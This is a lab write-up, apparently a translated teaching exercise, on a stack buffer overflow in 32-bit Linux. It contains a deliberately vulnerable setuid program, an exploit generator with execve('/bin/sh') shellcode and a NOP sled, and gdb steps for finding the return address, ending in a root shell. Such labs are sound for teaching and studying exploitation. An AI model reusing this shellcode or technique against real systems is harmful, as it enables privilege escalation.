Initial settings
-
In Ubuntu and other Linux systems, address space randomization is used to randomize the initial addresses of the heap and stack, which makes it very difficult to guess the accurate memory address, which is the key to buffer overflow attack.
-
In addition, in order to further prevent buffer overflow attacks and other attacks using shell programs, many shell programs automatically give up their privileges when called. Therefore, even if you can cheat a set uid program to call a shell, you can't maintain root permission in the shell. This protective measure is / bin/bash Implemented in.
-
Enter the command to enter the 32-bit linux environment.
Vulnerability program
stack.c
/* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task is to exploit this vulnerability */ #include #include #include int bof(char *str) { char buffer[12]; /* The following statement has a buffer overflow problem */ strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly\n"); return 1; }
Compile
Attack program
/* exploit.c */ /* A program that creates a file containing code for launching shell*/ #include #include #include char shellcode[] = "\x31\xc0" //xorl %eax,%eax "\x50" //pushl %eax "\x68""//sh" //pushl $0x68732f2f "\x68""/bin" //pushl $0x6e69622f "\x89\xe3" //movl %esp,%ebx "\x50" //pushl %eax "\x53" //pushl %ebx "\x89\xe1" //movl %esp,%ecx "\x99" //cdq "\xb0\x0b" //movb $0x0b,%al "\xcd\x80" //int $0x80 ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); //The first four bytes at the buffer specific offset overwrite the sellcode address strcpy(buffer + 100, shellcode); //Copy the shellcode to the buffer with the offset set to 100 /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }
gdb debug attacker
Enter disass main
The starting address of str is in esp, and the breakpoint is set at address 0x080484ee
Finally, get the address of str and calculate the address of shellcode
Now modify exploit.c File, will \ x??\x??\x??\x?? Modify to calculated result \ x14\xd0\xff\xff.
compile
attack
Obtained root privileges
practice
Experimental principle
Buffer overflow is because the length of data exceeds the pre allocated space during program execution, resulting in covering the allocation area of other data, so as to execute unauthorized instructions, obtain information, obtain system privileges, and then carry out various illegal operations, resulting in program failure, system downtime, restart and other consequences. This vulnerability can be used by malicious users to change the flow control of the program and even execute arbitrary fragments of code. This vulnerability occurs because the data buffer and return address are temporarily closed. Overflow will cause the return address to be rewritten.